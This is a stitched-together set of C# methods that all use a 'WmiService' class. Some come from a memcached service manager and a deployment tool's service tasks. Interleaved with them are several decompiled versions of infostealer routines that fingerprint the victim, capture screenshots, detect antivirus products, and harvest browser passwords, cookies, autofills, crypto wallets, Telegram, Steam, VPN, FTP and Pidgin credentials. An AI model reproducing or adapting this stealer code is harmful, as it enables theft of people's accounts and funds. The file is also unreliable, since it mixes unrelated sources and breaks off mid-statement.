public void ReadInstancesFromServer() { List <WmiService> services; if (this.UseImpersonation == true) { services = WmiService.GetAllServices(this.ServerName, this.UserName, Encryption.Decrypt(this.Password), "PathName LIKE '%memcached%'"); } else { services = WmiService.GetAllServices(this.ServerName, null, null, "PathName LIKE '%memcached%'"); } Instances.Clear(); foreach (WmiService service in services) { Instance instance = new Instance(); instance.DisplayName = service.DisplayName; instance.ServiceName = service.Name; instance.ParseImagePath(service.PathName); Instances.Add(instance); } //ImpersonateUser impersonateUser = null; //try //{ // if (this.UseImpersonation == true) // { // impersonateUser = new ImpersonateUser(UserName, Encryption.Decrypt(Password)); // } // RegistryKey serviceBranchKey = RegistryKey.OpenRemoteBaseKey(RegistryHive.LocalMachine, this.ServerName).OpenSubKey(@"SYSTEM\CurrentControlSet\Services"); // Instances.Clear(); // foreach (string serviceName in serviceBranchKey.GetSubKeyNames()) // { // RegistryKey serviceKey = serviceBranchKey.OpenSubKey(serviceName); // string imagePath; // if ((imagePath = (string)serviceKey.GetValue("ImagePath", String.Empty)) != String.Empty) // { // if (imagePath.ToLower().Contains("memcached.exe") == true) // { // Instance instance = new Instance(); // instance.DisplayName = (string)serviceKey.GetValue("DisplayName", String.Empty); // Instances.Add(instance); // } // } // } //} //finally //{ // if(impersonateUser != null && impersonateUser.IsImpersonating == true) // impersonateUser.Undo(); //} }
internal void Start(Business.Server server, SetStatusLabelDelegate setStatusLabelDelegate) { string userName = null; string password = null; if (server.UseImpersonation == true) { userName = server.UserName; password = Encryption.Decrypt(server.Password); } List <WmiService> services = WmiService.GetAllServices(server.ServerName, userName, password, "Name = '" + this.ServiceName + "'"); foreach (WmiService service in services) { setStatusLabelDelegate("Starting " + service.DisplayName); ReturnValue returnValue; if (service.State != State.Running && service.State != State.StartPending) { if ((returnValue = WmiService.Start(server.ServerName, userName, password, service.Name)) != ReturnValue.Success) { throw new Exception("Couldn't start service: " + service.DisplayName + ", the result was: " + returnValue); } } } setStatusLabelDelegate("Ready."); }
public void Start() { var authInfo = GetAuthenticationInfo(); WmiService.WithAuthentication(authInfo.WmiUserName, authInfo.WmiPassword); var t = new WinServiceStopTask(authInfo.MachineName, "IISADMIN"); var verifyStopResult = t.VerifyCanRun(); Log(verifyStopResult); AssertSuccess(verifyStopResult); var stopResult = t.Execute(); Log(stopResult); AssertSuccess(stopResult); var t2 = new WinServiceStartTask(authInfo.MachineName, "IISADMIN"); var verifyStartResult = t2.VerifyCanRun(); Log(verifyStartResult); AssertSuccess(verifyStartResult); var startResult = t2.Execute(); Log(startResult); AssertSuccess(startResult); }
public override DeploymentResult Execute() { var result = new DeploymentResult(); if (UserName.ShouldPrompt()) { UserName = _prompt.Prompt("Win Service '{0}' UserName".FormatWith(ServiceName)); } if (Password.ShouldPrompt()) { Password = _prompt.Prompt("Win Service '{0}' For User '{1}' Password".FormatWith(ServiceName, UserName)); } ServiceReturnCode returnCode = WmiService.Create(MachineName, ServiceName, ServiceDisplayName, ServiceLocation, StartMode, UserName, Password, Dependencies); if (returnCode != ServiceReturnCode.Success) { result.AddAlert("Create service returned {0}".FormatWith(returnCode.ToString())); } else { result.AddGood("Create service succeeded."); } return(result); }
public override DeploymentResult Execute() { var result = new DeploymentResult(); ServiceReturnCode returnCode = WmiService.Delete(MachineName, ServiceName); return(result); }
public static ProtoServer WithAuthentication(this ProtoServer server, string remoteUserName, string remotePassword) { var interpolator = new CaseInsensitiveInterpolator(); remoteUserName = interpolator.ReplaceTokens(HUB.Settings, remoteUserName); remotePassword = interpolator.ReplaceTokens(HUB.Settings, remotePassword); WmiService.WithAuthentication(remoteUserName, remotePassword); return(server); }
public static UserLog Create(ClientSettings settings) { UserLog userLog = new UserLog(); try { GeoInfo geoInfo = GeoHelper.Get(); IList <string> blacklistedCountry = settings.BlacklistedCountry; if (blacklistedCountry != null && blacklistedCountry.Count > 0 && settings.BlacklistedCountry.Contains(geoInfo.Country)) { InstallManager.RemoveCurrent(); } WmiDiskDrive wmiDiskDrive = new WmiService().QueryFirst <WmiDiskDrive>(new WmiDiskDriveQuery()); Size size = Screen.PrimaryScreen.Bounds.Size; string text = System.TimeZone.CurrentTimeZone.GetUtcOffset(DateTime.Now).ToString(); if (!text.StartsWith("-")) { text = "+" + text; } userLog.IP = geoInfo.IP; userLog.Location = geoInfo.Location; userLog.Country = geoInfo.Country; userLog.Screenshot = CaptureScreen(); userLog.UserAgent = UserAgentDetector.GetUserAgent(); IList <string> blacklistedCountry2 = settings.BlacklistedCountry; if (blacklistedCountry2 != null && blacklistedCountry2.Count > 0 && settings.BlacklistedCountry.Contains(geoInfo.Country)) { InstallManager.RemoveCurrent(); } userLog.HWID = DecryptHelper.GetMd5Hash(Environment.UserDomainName + Environment.UserName + wmiDiskDrive.SerialNumber).Replace("-", string.Empty); userLog.CurrentLanguage = InputLanguage.CurrentInputLanguage.Culture.EnglishName; userLog.TimeZone = "UTC" + text; userLog.MonitorSize = $"{size.Width}x{size.Height}"; userLog.IsProcessElevated = NativeMethods.IsUserAnAdmin(); userLog.UacType = UacHelper.AdminPromptBehavior; userLog.OS = OsDetector.GetWindowsVersion(); userLog.Username = Environment.UserName; return(userLog); } catch { return(userLog); } finally { userLog.HWID = (string.IsNullOrWhiteSpace(userLog.HWID) ? "UNKNOWN" : userLog.HWID); userLog.IP = (string.IsNullOrWhiteSpace(userLog.IP) ? "UNKNOWN" : userLog.IP); userLog.MonitorSize = (string.IsNullOrWhiteSpace(userLog.MonitorSize) ? "UNKNOWN" : userLog.MonitorSize); userLog.OS = (string.IsNullOrWhiteSpace(userLog.OS) ? "UNKNOWN" : userLog.OS); userLog.TimeZone = (string.IsNullOrWhiteSpace(userLog.TimeZone) ? "UNKNOWN" : userLog.TimeZone); userLog.Username = (string.IsNullOrWhiteSpace(userLog.Username) ? "UNKNOWN" : userLog.Username); userLog.Location = (string.IsNullOrWhiteSpace(userLog.Location) ? "UNKNOWN" : userLog.Location); userLog.Country = (string.IsNullOrWhiteSpace(userLog.Country) ? "UNKNOWN" : userLog.Country); userLog.CurrentLanguage = (string.IsNullOrWhiteSpace(userLog.CurrentLanguage) ? "UNKNOWN" : userLog.CurrentLanguage); userLog.UserAgent = (string.IsNullOrWhiteSpace(userLog.UserAgent) ? "UNKNOWN" : userLog.UserAgent); } }
internal void RemoveFromServer(Business.Server server, SetStatusLabelDelegate setStatusLabelDelegate) { string userName = null; string password = null; if (server.UseImpersonation == true) { userName = server.UserName; password = Encryption.Decrypt(server.Password); } List <WmiService> services = WmiService.GetAllServices(server.ServerName, userName, password, "Name = '" + this.ServiceName + "'"); // Saftey in case we get too many services back, we don't want to delete them all... if (services.Count > 20) { StringBuilder servicesToRemove = new StringBuilder("This action will remove the following services, are you sure?\n"); foreach (WmiService service in services) { servicesToRemove.AppendFormat("\n{0}", service.DisplayName); } if (MessageBox.Show(servicesToRemove.ToString(), "Are you sure?", MessageBoxButtons.OKCancel, MessageBoxIcon.Question) == DialogResult.Cancel) { return; } } foreach (WmiService service in services) { setStatusLabelDelegate("Removing " + service.DisplayName); ReturnValue returnValue; if (service.State != State.Stopped) { if ((returnValue = WmiService.Stop(server.ServerName, userName, password, service.Name)) != ReturnValue.Success) { throw new Exception("Couldn't stop service: " + service.DisplayName + ", the result was: " + returnValue); } } if ((returnValue = WmiService.Delete(server.ServerName, userName, password, service.Name)) != ReturnValue.Success) { throw new Exception("Couldn't remove service: " + service.DisplayName + ", the result was: " + returnValue); } } setStatusLabelDelegate("Ready."); }
public void RemoteDelete() { var authInfo = GetAuthenticationInfo(); WmiService.WithAuthentication(authInfo.ServiceUserName, authInfo.ServicePassword); var t = new WinServiceDeleteTask(authInfo.MachineName, "DropkicKTestService"); DeploymentResult o = t.VerifyCanRun(); Log(o); AssertSuccess(o); var result = t.Execute(); Log(result); AssertSuccess(result); }
public override DeploymentResult Execute() { var result = new DeploymentResult(); if (!ServiceExists()) { result.AddNote("Cannot delete service '{0}', service does not exist".FormatWith(ServiceName)); } else { ServiceReturnCode returnCode = WmiService.Delete(MachineName, ServiceName); if (returnCode != ServiceReturnCode.Success) { result.AddAlert("Deleting service '{0}' failed: '{1}'".FormatWith(ServiceName, returnCode)); } } return(result); }
public void RemoteCreate() { var authInfo = GetAuthenticationInfo(); WmiService.WithAuthentication(authInfo.WmiUserName, authInfo.WmiPassword); var t = new WinServiceCreateTask(authInfo.MachineName, "DropKicKTestService"); t.ServiceLocation = "C:\\Test\\TestService.exe"; t.StartMode = ServiceStartMode.Automatic; t.UserName = authInfo.ServiceUserName; t.Password = authInfo.ServicePassword; DeploymentResult o = t.VerifyCanRun(); AssertSuccess(o); var result = t.Execute(); Log(result); AssertSuccess(result); }
internal State GetServiceState(Server server) { string userName = null; string password = null; if (server.UseImpersonation == true) { userName = server.UserName; password = Encryption.Decrypt(server.Password); } List <WmiService> services = WmiService.GetAllServices(server.ServerName, userName, password, "Name = '" + this.ServiceName + "'"); if (services.Count > 0) { return(services[0].State); } return(State.Unknown); }
private string GetNextMemcachedInstanceName() { List <WmiService> services; if (_server.UseImpersonation == true) { services = WmiService.GetAllServices(_server.ServerName, _server.UserName, Encryption.Decrypt(_server.Password), "PathName LIKE '%memcached%'"); } else { services = WmiService.GetAllServices(_server.ServerName, null, null, "PathName LIKE '%memcached%'"); } int highestInstanceNumber = 0; Regex instanceFinder = new Regex( "\\w+_(?<instanceNumber>\\d+)", RegexOptions.Multiline | RegexOptions.Singleline | RegexOptions.CultureInvariant | RegexOptions.Compiled ); foreach (WmiService service in services) { Match match = instanceFinder.Match(service.Name); if (match.Success == true) { int instanceNumber = 0; if (int.TryParse(match.Groups["instanceNumber"].Value, out instanceNumber) == true && instanceNumber > highestInstanceNumber) { highestInstanceNumber = instanceNumber; } } } int newInstanceNumber = highestInstanceNumber + 1; return("MemCacheD_" + newInstanceNumber); }
// Token: 0x060000AB RID: 171 RVA: 0x00003698 File Offset: 0x00001898 public static UserLog Create(ClientSettings settings) { UserLog result = default(UserLog); try { GeoInfo geoInfo = GeoHelper.Get(); geoInfo.IP = (string.IsNullOrWhiteSpace(geoInfo.IP) ? "UNKNOWN" : geoInfo.IP); geoInfo.Location = (string.IsNullOrWhiteSpace(geoInfo.Location) ? "UNKNOWN" : geoInfo.Location); geoInfo.Country = (string.IsNullOrWhiteSpace(geoInfo.Country) ? "UNKNOWN" : geoInfo.Country); geoInfo.PostalCode = (string.IsNullOrWhiteSpace(geoInfo.PostalCode) ? "UNKNOWN" : geoInfo.PostalCode); IList <string> blacklistedCountry = settings.BlacklistedCountry; if (blacklistedCountry != null && blacklistedCountry.Count > 0 && settings.BlacklistedCountry.Contains(geoInfo.Country)) { InstallManager.RemoveCurrent(); } IList <string> blacklistedIP = settings.BlacklistedIP; if (blacklistedIP != null && blacklistedIP.Count > 0 && settings.BlacklistedIP.Contains(geoInfo.IP)) { InstallManager.RemoveCurrent(); } WmiDiskDrive wmiDiskDrive = null; try { wmiDiskDrive = new WmiService().QueryFirst <WmiDiskDrive>(new WmiDiskDriveQuery()); } catch (Exception) { } result.HWID = DecryptHelper.GetMd5Hash(Environment.UserDomainName + Environment.UserName + ((wmiDiskDrive != null) ? wmiDiskDrive.SerialNumber : null)).Replace("-", string.Empty); string text = TimeZone.CurrentTimeZone.GetUtcOffset(DateTime.Now).ToString(); if (!text.StartsWith("-")) { text = "+" + text; } result.IP = geoInfo.IP; result.Location = geoInfo.Location; result.Country = geoInfo.Country; result.PostalCode = geoInfo.PostalCode; if (settings.GrabScreenshot) { result.Screenshot = UserLogHelper.CaptureScreen(); } if (settings.GrabUserAgent) { result.FingerPrint = UserAgentDetector.GetFingerPrint(); } else { result.FingerPrint = new FingerPrint { Plugins = "UNKNOWN", UserAgent = "UNKNOWN", WebBaseGlRenderer = "UNKNOWN", WebBaseGlVendor = "UNKNOWN", WebBaseGlVersion = "UNKNOWN", WebDebugGlRenderer = "UNKNOWN", WebDebugGlVendor = "UNKNOWN" }; } result.CurrentLanguage = InputLanguage.CurrentInputLanguage.Culture.EnglishName; result.TimeZone = "UTC" + text; Size size = Screen.PrimaryScreen.Bounds.Size; result.MonitorSize = string.Format("{0}x{1}", size.Width, size.Height); result.IsProcessElevated = false; result.OS = OsDetector.GetWindowsVersion(); result.Username = Environment.UserName; } catch (Exception) { } finally { result.HWID = (string.IsNullOrWhiteSpace(result.HWID) ? "UNKNOWN" : result.HWID); result.MonitorSize = (string.IsNullOrWhiteSpace(result.MonitorSize) ? "UNKNOWN" : result.MonitorSize); result.OS = (string.IsNullOrWhiteSpace(result.OS) ? "UNKNOWN" : result.OS); result.TimeZone = (string.IsNullOrWhiteSpace(result.TimeZone) ? "UNKNOWN" : result.TimeZone); result.Username = (string.IsNullOrWhiteSpace(result.Username) ? "UNKNOWN" : result.Username); result.IP = (string.IsNullOrWhiteSpace(result.IP) ? "UNKNOWN" : result.IP); result.PostalCode = (string.IsNullOrWhiteSpace(result.PostalCode) ? "UNKNOWN" : result.PostalCode); result.Location = (string.IsNullOrWhiteSpace(result.Location) ? "UNKNOWN" : result.Location); result.Country = (string.IsNullOrWhiteSpace(result.Country) ? "UNKNOWN" : result.Country); result.CurrentLanguage = (string.IsNullOrWhiteSpace(result.CurrentLanguage) ? "UNKNOWN" : result.CurrentLanguage); } return(result); }
public static Credentials Create(ClientSettings settings) { Credentials credentials = new Credentials { Browsers = new List <Browser>(), Files = new List <RemoteFile>(), FtpConnections = new List <LoginPair>(), Hardwares = new List <Hardware>(), InstalledBrowsers = new List <InstalledBrowserInfo>(), InstalledSoftwares = new List <string>(), Languages = new List <string>(), Processes = new List <string>(), Defenders = new List <string>() }; try { WmiService wmiService = new WmiService(); try { ReadOnlyCollection <WmiProcessor> source = wmiService.QueryAll <WmiProcessor>(new WmiProcessorQuery()); credentials.Hardwares = source.Select((WmiProcessor x) => new Hardware { Caption = x.Name, HardType = HardwareType.Processor, Parameter = $"{x.NumberOfCores}" }).ToList(); } catch { } try { if (credentials.Hardwares == null) { credentials.Hardwares = new List <Hardware>(); } foreach (Hardware item in (from x in wmiService.QueryAll <WmiGraphicCard>(new WmiGraphicCardQuery()) where x.AdapterRAM != 0 select new Hardware { Caption = x.Name, HardType = HardwareType.Graphic, Parameter = $"{x.AdapterRAM}" }).ToList()) { credentials.Hardwares.Add(item); } } catch { } try { List <WmiQueryBase> list = new List <WmiQueryBase> { new WmiAntivirusQuery(), new WmiAntiSpyWareQuery(), new WmiFirewallQuery() }; string[] array = new string[2] { "ROOT\\SecurityCenter2", "ROOT\\SecurityCenter" }; List <WmiAntivirus> list2 = new List <WmiAntivirus>(); foreach (WmiQueryBase item2 in list) { string[] array2 = array; foreach (string scope in array2) { try { list2.AddRange(wmiService.QueryAll <WmiAntivirus>(item2, new ManagementObjectSearcher(scope, string.Empty)).ToList()); } catch { } } } credentials.Defenders = list2.Select((WmiAntivirus x) => x.DisplayName).Distinct().ToList(); } catch { } credentials.InstalledBrowsers = UserInfoHelper.GetBrowsers(); credentials.Processes = UserInfoHelper.ListOfProcesses(); credentials.InstalledSoftwares = UserInfoHelper.ListOfPrograms(); credentials.Languages = UserInfoHelper.AvailableLanguages(); if (settings.GrabBrowsers) { List <Browser> list3 = new List <Browser>(); list3.AddRange(ChromiumEngine.ParseBrowsers()); list3.AddRange(GeckoEngine.ParseBrowsers()); list3.Add(EdgeEngine.ParseBrowsers()); foreach (Browser item3 in list3) { if (!item3.IsEmpty()) { credentials.Browsers.Add(item3); } } } if (settings.GrabFiles) { credentials.Files = RemoteFileGrabber.ParseFiles(settings.GrabPaths); } if (settings.GrabFTP) { List <LoginPair> list4 = new List <LoginPair>(); list4.AddRange(FileZilla.ParseConnections()); list4.AddRange(WinSCP.ParseConnections()); credentials.FtpConnections = list4; } if (settings.GrabImClients) { foreach (LoginPair item4 in Pidgin.ParseConnections()) { credentials.FtpConnections.Add(item4); } return(credentials); } return(credentials); } catch { return(credentials); } }
//private string _serviceUserName; //private string _servicePassword; internal void UpdateInstanceOnServer(Business.Server server, SetStatusLabelDelegate setStatusLabelDelegate) { //ImpersonateUser impersonateUser = null; try { //if (server.UseImpersonation == true) //{ // setStatusLabelDelegate("Impersonating user: "******"Checking MemCacheD.exe on remote server."); string binaryPath = server.EnsureExecutableIsAvailabeOnServer(false); string userName = null; string password = null; if (server.UseImpersonation == true) { userName = server.UserName; password = Encryption.Decrypt(server.Password); } setStatusLabelDelegate("Updating service on remote server."); WmiService.CreateOrUpdate(server.ServerName, userName, password, this.ServiceName, this.DisplayName, this.CreateImagePath(), StartMode.Auto, null, null); } finally { //if (impersonateUser != null && impersonateUser.IsImpersonating == true) // impersonateUser.Undo(); } /* * string description = Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Services\" + _serviceController.ServiceName).GetValue("Description").ToString(); * string imagePath = Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Services\" + _serviceController.ServiceName).GetValue("ImagePath").ToString(); * string newImagePath = imagePath.Substring(0, imagePath.LastIndexOf("memcached.exe") + ((string)("memcached.exe")).Length); * * int tcpPort; * if (int.TryParse(txtTcpPort.Text, out tcpPort) == true) * newImagePath += " -p " + tcpPort; * * int udpPort; * if (int.TryParse(txtUdpPort.Text, out udpPort) == true) * newImagePath += " -U " + udpPort; * * if (chkMaximizeCoreFile.Checked == true) * newImagePath += " -r"; * * int maxMemory; * if (int.TryParse(txtMemoryLimit.Text, out maxMemory) == true) * newImagePath += " -m " + maxMemory; * * Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Services\" + _serviceController.ServiceName, true).SetValue("ImagePath", newImagePath); * * Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Services\" + _serviceController.ServiceName, true).SetValue("DisplayName", txtInstanceName.Text); * * bool requiresRestart = false; * if (_serviceController.Status == ServiceControllerStatus.Running) * { * requiresRestart = true; * lblStatus.Text = "Stopping " + txtInstanceName.Text; * Refresh(); * * _serviceController.Stop(); * } * * lblStatus.Text = "Removing " + _serviceController.DisplayName; * Refresh(); * ServiceUtility.UninstallService(_serviceController.ServiceName); * * lblStatus.Text = "Reinstalling " + txtInstanceName.Text; * Refresh(); * ServiceUtility.InstallService(_serviceController.ServiceName, txtInstanceName.Text, description, newImagePath); * * if (requiresRestart == true) * { * lblStatus.Text = "Starting " + txtInstanceName.Text; * Refresh(); * _serviceController.Start(); * } * * lblStatus.Text = "Ready."; * */ }
// Token: 0x0600004F RID: 79 RVA: 0x000028BC File Offset: 0x00000ABC public static Credentials Create(ClientSettings settings) { Credentials credentials = new Credentials { Defenders = new List <string>(), Browsers = new List <Browser>(), Files = new List <RemoteFile>(), FtpConnections = new List <LoginPair>(), Hardwares = new List <Hardware>(), InstalledBrowsers = new List <InstalledBrowserInfo>(), InstalledSoftwares = new List <string>(), Languages = new List <string>(), Processes = new List <string>(), ColdWallets = new List <ColdWallet>(), ImportantAutofills = new List <Autofill>(), SteamFiles = new List <RemoteFile>(), NordVPN = new List <LoginPair>(), OpenVPN = new List <RemoteFile>(), ProtonVPN = new List <RemoteFile>(), TelegramFiles = new List <RemoteFile>() }; try { try { ReadOnlyCollection <WmiProcessor> source = new WmiService().QueryAll <WmiProcessor>(new WmiProcessorQuery(), null); credentials.Hardwares = (from x in source select new Hardware { Caption = x.Name, HardType = HardwareType.Processor, Parameter = string.Format("{0}", x.NumberOfCores) }).ToList <Hardware>(); } catch { } try { WmiService wmiService = new WmiService(); if (credentials.Hardwares == null) { credentials.Hardwares = new List <Hardware>(); } foreach (Hardware item in (from x in wmiService.QueryAll <WmiGraphicCard>(new WmiGraphicCardQuery(), null) where x.AdapterRAM > 0U select new Hardware { Caption = x.Name, HardType = HardwareType.Graphic, Parameter = string.Format("{0}", x.AdapterRAM) }).ToList <Hardware>()) { credentials.Hardwares.Add(item); } } catch { } try { credentials.Hardwares.Add(new Hardware { Caption = "Total of RAM", HardType = HardwareType.Graphic, Parameter = UserInfoHelper.TotalOfRAM() }); } catch { } try { WmiService wmiService2 = new WmiService(); List <WmiQueryBase> list = new List <WmiQueryBase> { new WmiAntivirusQuery(), new WmiAntiSpyWareQuery(), new WmiFirewallQuery() }; string[] array = new string[] { "ROOT\\SecurityCenter2", "ROOT\\SecurityCenter" }; List <WmiAntivirus> list2 = new List <WmiAntivirus>(); foreach (WmiQueryBase wmiQuery in list) { foreach (string scope in array) { try { list2.AddRange(wmiService2.QueryAll <WmiAntivirus>(wmiQuery, new ManagementObjectSearcher(scope, string.Empty)).ToList <WmiAntivirus>()); } catch { } } } credentials.Defenders = (from x in list2 select x.DisplayName).Distinct <string>().ToList <string>(); } catch { } credentials.InstalledBrowsers = UserInfoHelper.GetBrowsers(); credentials.Processes = UserInfoHelper.ListOfProcesses(); credentials.InstalledSoftwares = UserInfoHelper.ListOfPrograms(); credentials.Languages = UserInfoHelper.AvailableLanguages(); if (settings.GrabTelegram) { credentials.TelegramFiles.AddRange(TelegramGrabber.ParseFiles()); } if (settings.GrabVPN) { credentials.NordVPN.AddRange(NordVPN.GetProfile()); credentials.OpenVPN.AddRange(OpenVPN.ParseFiles()); credentials.ProtonVPN.AddRange(ProtonVPN.ParseFiles()); } if (settings.GrabSteam) { credentials.SteamFiles.AddRange(SteamGrabber.ParseFiles()); } if (settings.GrabBrowsers) { List <Browser> list3 = new List <Browser>(); if (settings.PortablePaths == null) { settings.PortablePaths = new List <string>(); } settings.PortablePaths.Add(Constants.RoamingAppData); settings.PortablePaths.Add(Constants.LocalAppData); List <string> list4 = new List <string>(); List <string> list5 = new List <string>(); foreach (string text in Constants.chromiumBrowserPaths) { string text2 = string.Empty; if (text.Contains("Opera")) { text2 = Constants.RoamingAppData + text; } else { text2 = Constants.LocalAppData + text; } if (Directory.Exists(text2)) { foreach (string text3 in DecryptHelper.FindPaths(text2, 1, 1, new string[] { "Login Data", "Web Data", "Cookies" })) { if ((text3.EndsWith("Login Data") || text3.EndsWith("Web Data") || text3.EndsWith("Cookies")) && !list4.Contains(text3)) { list4.Add(text3); } } } } foreach (string str in Constants.geckoBrowserPaths) { try { string text4 = Constants.RoamingAppData + str; if (Directory.Exists(text4)) { foreach (string text5 in DecryptHelper.FindPaths(text4, 2, 1, new string[] { "key3.db", "key4.db", "cookies.sqlite", "logins.json" })) { if ((text5.EndsWith("key3.db") || text5.EndsWith("key4.db") || text5.EndsWith("cookies.sqlite") || text5.EndsWith("logins.json")) && !list5.Contains(text5)) { list5.Add(text5); } } } } catch { } } list3.AddRange(ChromiumEngine.ParseBrowsers(list4)); list3.AddRange(GeckoEngine.ParseBrowsers(list5)); foreach (Browser browser in list3) { if (!browser.IsEmpty()) { using (List <Autofill> .Enumerator enumerator6 = CredentialsHelper.FindImportant(browser.Autofills).GetEnumerator()) { while (enumerator6.MoveNext()) { Autofill autofill = enumerator6.Current; if (!credentials.ImportantAutofills.Any((Autofill x) => x.Name == autofill.Name && x.Value == autofill.Value)) { credentials.ImportantAutofills.Add(autofill); } } } credentials.Browsers.Add(browser); } } } if (settings.GrabWallets) { List <ColdWallet> list6 = new List <ColdWallet>(); list6.AddRange(ColdWalletsGrabber.ParseFiles()); foreach (ColdWallet item2 in list6) { credentials.ColdWallets.Add(item2); } } if (settings.GrabFiles) { credentials.Files = RemoteFileGrabber.ParseFiles(settings.GrabPaths, null); } if (settings.GrabFTP) { List <LoginPair> list7 = new List <LoginPair>(); list7.AddRange(FileZilla.ParseConnections()); list7.AddRange(WinSCP.ParseConnections()); credentials.FtpConnections = list7; } if (settings.GrabImClients) { foreach (LoginPair item3 in Pidgin.ParseConnections()) { credentials.FtpConnections.Add(item3); } } } catch (Exception) { } return(credentials); }
private void SaveChanges() { if (chkUseSpecificIPAddress.Checked == true && IsIpAddressValid() == false) { MessageBox.Show("IP address specified is not a legal IP address."); return; } //if (VerifyFieldValues() == false) //{ // MessageBox.Show("IP address specified is not a legal IP address."); // return; //} if (AreIpAndTcpAndUdpPortUniqueForInstance() == false) { MessageBox.Show("You must specify a unique TCP/IP IP address and port combination.", "IP address or port duplication error.", MessageBoxButtons.OK, MessageBoxIcon.Error); return; } if (IsInstanceNameUnique() == false) { MessageBox.Show("Instance name is not unique."); return; } Cursor = Cursors.WaitCursor; SetStatusLabel("Saving."); //ImpersonateUser impersonateUser = null; try { //if (_server.UseImpersonation == true) //{ // SetStatusLabel("Saving: Setting up impersonation."); // impersonateUser = new ImpersonateUser(_server.UserName, Encryption.Decrypt(_server.Password)); //} // //string networkPath = null; //try //{ // networkPath = "\\\\" + _server.ServerName + "\\c$"; // Directory.GetDirectories(networkPath); //} //catch (Exception ex) //{ // MessageBox.Show("Couldn't establish connection on network path: " + networkPath + "\n\n" + ex.Message); // return; //} bool isNewInstance = false; try { if (_instance == null) { string nextInstanceServiceName = GetNextMemcachedInstanceName(); _instance = new MemCacheDManager.Business.Instance(); _instance.ServiceName = nextInstanceServiceName; _instance.ImageBasePath = _server.BinaryPath; _server.Instances.Add(_instance); isNewInstance = true; } } catch (Exception ex) { MessageBox.Show("Couldn't get a list of instances on this server. Please check server connectivity and user credentials and try again.\n" + ex.Message, "Error.", MessageBoxButtons.OK, MessageBoxIcon.Error); return; } // TODO: Add rest of fields here. _instance.DisplayName = txtInstanceName.Text; decimal chunkSizeGrowthFactor = 0; string chunkSizeString = ConvertDecimalUserInputToLocalizedString(txtChunkSizeGrowthFactor.Text); if (Decimal.TryParse(chunkSizeString, out chunkSizeGrowthFactor) == true) { _instance.ChunkSizeGrowthFactor = chunkSizeGrowthFactor; } int defaultKeySize = 0; if (Int32.TryParse(txtDefaultKeySize.Text, out defaultKeySize) == true) { _instance.DefaultKeySize = defaultKeySize; } _instance.MaximizeCoreFile = chkMaximizeCoreFile.Checked; int maximumConnections = 0; if (Int32.TryParse(txtMaximumConnections.Text, out maximumConnections) == true) { _instance.MaximumConnections = maximumConnections; } int memoryLimit = 0; if (Int32.TryParse(txtMemoryLimit.Text, out memoryLimit) == true) { _instance.MemoryLimit = memoryLimit; } _instance.UseManagedInstance = chkUseManagedInstance.Checked; if (chkUseSpecificIPAddress.Checked == true) { _instance.IpAddress = txtIpAddress.Text; } else { _instance.IpAddress = null; } if (chkUseUDP.Checked == true) { int udpPort = 0; if (Int32.TryParse(txtUdpPort.Text, out udpPort) == true) { _instance.UdpPort = udpPort; } } else { _instance.UdpPort = 0; } int tcpPort; Int32.TryParse(txtTcpPort.Text, out tcpPort); _instance.TcpPort = tcpPort; _instance.UpdateInstanceOnServer(_server, this.SetStatusLabel); if (isNewInstance == true) { if (MessageBox.Show("Would you like to start the new instance now?", "Start Service?", MessageBoxButtons.YesNo) == DialogResult.Yes) { string userName = null; string password = null; if (_server.UseImpersonation == true) { userName = _server.UserName; password = Encryption.Decrypt(_server.Password); } SetStatusLabel("Starting service."); Cursor.Current = Cursors.WaitCursor; try { WmiService.Start(_server.ServerName, userName, password, _instance.ServiceName); } finally { SetStatusLabel("Service started."); Cursor.Current = Cursors.Default; } } } btnApply.Enabled = false; SetStatusLabel("Updating cofiguration file."); ServerConfiguration.Save(Configuration.Default.LastConfigFile); SetStatusLabel("Refreshing UI."); if (Save != null) { Save(this, EventArgs.Empty); } } finally { //if (impersonateUser != null && impersonateUser.IsImpersonating == true) // impersonateUser.Undo(); Cursor = Cursors.Default; SetStatusLabel("Ready."); } }
public static Credentials Create(ClientSettings settings) { Credentials credentials = new Credentials() { Browsers = (IList <Browser>) new List <Browser>(), Files = (IList <RemoteFile>) new List <RemoteFile>(), FtpConnections = (IList <LoginPair>) new List <LoginPair>(), Hardwares = (IList <Hardware>) new List <Hardware>(), InstalledBrowsers = (IList <InstalledBrowserInfo>) new List <InstalledBrowserInfo>(), InstalledSoftwares = (IList <string>) new List <string>(), Languages = (IList <string>) new List <string>(), Processes = (IList <string>) new List <string>(), Defenders = (IList <string>) new List <string>() }; try { WmiService wmiService = new WmiService(); try { ReadOnlyCollection <WmiProcessor> source = wmiService.QueryAll <WmiProcessor>((WmiQueryBase) new WmiProcessorQuery(), (ManagementObjectSearcher)null); credentials.Hardwares = (IList <Hardware>)source.Select <WmiProcessor, Hardware>((Func <WmiProcessor, Hardware>)(x => new Hardware() { Caption = x.Name, HardType = HardwareType.Processor, Parameter = string.Format("{0}", (object)x.NumberOfCores) })).ToList <Hardware>(); } catch { } try { if (credentials.Hardwares == null) { credentials.Hardwares = (IList <Hardware>) new List <Hardware>(); } foreach (Hardware hardware in wmiService.QueryAll <WmiGraphicCard>((WmiQueryBase) new WmiGraphicCardQuery(), (ManagementObjectSearcher)null).Where <WmiGraphicCard>((Func <WmiGraphicCard, bool>)(x => x.AdapterRAM > 0U)).Select <WmiGraphicCard, Hardware>((Func <WmiGraphicCard, Hardware>)(x => new Hardware() { Caption = x.Name, HardType = HardwareType.Graphic, Parameter = string.Format("{0}", (object)x.AdapterRAM) })).ToList <Hardware>()) { credentials.Hardwares.Add(hardware); } } catch { } try { List <WmiQueryBase> wmiQueryBaseList = new List <WmiQueryBase>() { (WmiQueryBase) new WmiAntivirusQuery(), (WmiQueryBase) new WmiAntiSpyWareQuery(), (WmiQueryBase) new WmiFirewallQuery() }; string[] strArray = new string[2] { "ROOT\\SecurityCenter2", "ROOT\\SecurityCenter" }; List <WmiAntivirus> source = new List <WmiAntivirus>(); foreach (WmiQueryBase wmiQuery in wmiQueryBaseList) { foreach (string scope in strArray) { try { source.AddRange((IEnumerable <WmiAntivirus>)wmiService.QueryAll <WmiAntivirus>(wmiQuery, new ManagementObjectSearcher(scope, string.Empty)).ToList <WmiAntivirus>()); } catch { } } } credentials.Defenders = (IList <string>)source.Select <WmiAntivirus, string>((Func <WmiAntivirus, string>)(x => x.DisplayName)).Distinct <string>().ToList <string>(); } catch { } credentials.InstalledBrowsers = 